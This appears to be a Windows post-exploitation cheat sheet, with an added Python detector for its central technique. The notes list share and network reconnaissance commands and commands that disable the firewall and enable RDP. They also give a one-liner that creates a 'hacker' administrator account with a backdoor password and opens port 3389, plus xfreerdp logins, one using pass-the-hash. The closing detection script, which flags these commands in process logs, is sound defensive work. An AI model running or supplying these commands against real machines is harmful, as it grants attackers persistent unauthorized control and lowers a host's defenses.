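Network shares
net view    list hosts
net view /all /domain [domainname]    list shares in the domain
net view \\computer /ALL    list shares on a host
net use x: \\computer\share    mount the share locally
net share    show current shares
hosts file
Check whether other known hosts are listed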
type C:\Windows\System32\drivers\etc\hosts
Network adapters and DNS
ipconfig /all
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
Get-DnsClientServerAddress -AddressFamily IPv4 | ft
Open ports
Routing table
route print
Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex
ARP cache
arp -A
Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,L
Firewall
netsh firewall show state    firewall state (on/off)
netsh advfirewall firewall show rule name=all
netsh firewall show config    firewall configuration
netsh advfirewall show allprofiles
netsh advfirewall set allprofiles state off    turn the firewall off
netsh advfirewall set allprofiles state on    turn the firewall on
netsh firewall set opmode disable    turn the firewall off on older Windows Server versions
Open a port
netsh advfirewall firewall add rule name="NetBIOS UDP Port 138" dir=out action=allow protocol=UDP localport=138
netsh advfirewall firewall add rule name="NetBIOS TCP Port 139" dir=in action=allow protocol=TCP localport=139
netsh firewall add portopening TCP 3389 "Remote Desktop"
Enable RDP
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh firewall add portopening TCP 3389 "Remote Desktop"
Enable Remote Assistance
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
netsh firewall set service remoteadmin enable
Classic combo
Add a user, add it to the Administrators and Remote Desktop Users groups, enable RDP, and open the firewall for it
net user hacker Hacker123! /add & net localgroup administrators hacker /add & net localgroup "Remote Desktop Users" hacker /add & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & netsh firewall add portopening TCP 3389 "Remote Desktop" & netsh firewall set service remoteadmin enable
Connect over RDP
xfreerdp /u:alice /d:WORKGROUP /pth:b74242f37e47371aff835a6ebcac4ffe /v:10.11.1.49
xfreerdp /u:hacker /d:WORKGROUP /p:Hacker123! /v:10.11.1.49
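
Detecting the classic combo (added example, not part of the original notes): the account, registry and firewall commands above each show up in process-creation logs, so a defender can alert when several of them occur on one host within a short window. The Python below assumes command lines are already exported from such logs (for example Windows event 4688 with command-line auditing, or Sysmon event 1); the rule names, host names, timestamps, window and threshold are constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

NET, I = r"\bnet1?(?:\.exe)?\s+", re.I
# One rule per behaviour in this page's commands; rule names are this example's own.
RULES = {
    "user_add": re.compile(NET + r"user\s+\S+.*?/add\b", I),
    "group_add": re.compile(NET + r'localgroup\s+"?(?:administrators|remote desktop users)"?\s+\S+\s+/add\b', I),
    "rdp_enable": re.compile(r"\breg(?:\.exe)?\s+add\b.*fDenyTSConnections.*/d\s+0\b", I),
    "remote_assist": re.compile(r"\breg(?:\.exe)?\s+add\b.*fAllowToGetHelp.*/d\s+1\b", I),
    "fw_open_3389": re.compile(r"\bnetsh(?:\.exe)?\s+(?:adv)?firewall\b.*\b3389\b", I),
    "fw_disable": re.compile(r"\bnetsh(?:\.exe)?\s+(?:advfirewall\s+set\s+allprofiles\s+state\s+off|firewall\s+set\s+opmode\s+disable)\b", I),
}

def classify(cmdline):
    """Return the rule names matched by one process command line."""
    line = cmdline.replace("\u201c", '"').replace("\u201d", '"')  # undo smart quotes
    hits = set()
    for part in line.split("&"):  # cmd.exe chains commands with '&'
        hits |= {name for name, rx in RULES.items() if rx.search(part)}
    return hits

def detect(events, window=timedelta(minutes=5), threshold=3):
    """Alert on hosts showing >= threshold distinct behaviours inside one window."""
    per_host = defaultdict(list)
    for host, ts, cmdline in events:
        per_host[host] += [(datetime.fromisoformat(ts), n) for n in classify(cmdline)]
    alerts = {}
    for host, hits in per_host.items():
        for start, _ in hits:
            seen = {n for t, n in hits if start <= t <= start + window}
            if len(seen) >= threshold:
                alerts.setdefault(host, set()).update(seen)
    return {host: sorted(names) for host, names in alerts.items()}

KEY = r'"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"'
# Constructed process-creation records: (host, timestamp, command line).
SAMPLE_EVENTS = [
    ("WS01", "2024-05-01T10:00:00", r'cmd /c net user hacker Hacker123! /add & net localgroup administrators hacker /add & reg add ' + KEY + r' /v fDenyTSConnections /t REG_DWORD /d 0 /f & netsh firewall add portopening TCP 3389 "Remote Desktop"'),
    ("WS02", "2024-05-01T09:00:00", "net user svc_tmp Passw0rd! /add"),
    ("WS02", "2024-05-01T09:01:00", "reg add " + KEY + " /v fDenyTSConnections /t REG_DWORD /d 0 /f"),
    ("WS02", "2024-05-01T09:02:00", "netsh advfirewall set allprofiles state off"),
    ("WS03", "2024-05-01T11:00:00", "reg add " + KEY + " /v fDenyTSConnections /t REG_DWORD /d 0 /f"),
    ("WS04", "2024-05-01T08:00:00", "net user tmp1 Passw0rd! /add"),
    ("WS04", "2024-05-01T12:00:00", "netsh firewall set opmode disable"),
    ("WS04", "2024-05-01T16:00:00", "reg add " + KEY + " /v fDenyTSConnections /t REG_DWORD /d 0 /f"),
]
print(detect(SAMPLE_EVENTS))
```

WS01 (the chained one-liner) and WS02 (the same steps as separate processes) are flagged; WS03 (RDP enabled on its own) and WS04 (the same behaviours spread over hours) are not.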
